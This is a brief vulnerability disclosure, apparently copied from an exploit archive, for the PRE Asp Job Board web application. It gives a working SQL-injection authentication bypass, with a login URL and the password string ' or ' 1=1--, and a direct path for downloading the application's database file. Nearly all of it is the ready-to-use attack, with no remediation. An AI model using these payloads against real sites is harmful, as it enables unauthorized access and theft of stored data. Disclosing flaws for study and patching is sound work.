PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

link 1: http://www.exploiter5.com/all.php?id=45

link 2: http://packetstormsecurity.org/0812-exploits/preasp-sqldisclose.txt

Discovered By: ZoRLu   

exp for demo: (bypass)

login:

http://preproject.com/preaspjobboard//Employee/emp_login.asp

user: ZoRLu

passwd: ' or ' 1=1--

exp for demo: (DD)

http://preproject.com/preaspjobboard/db/pre.mdb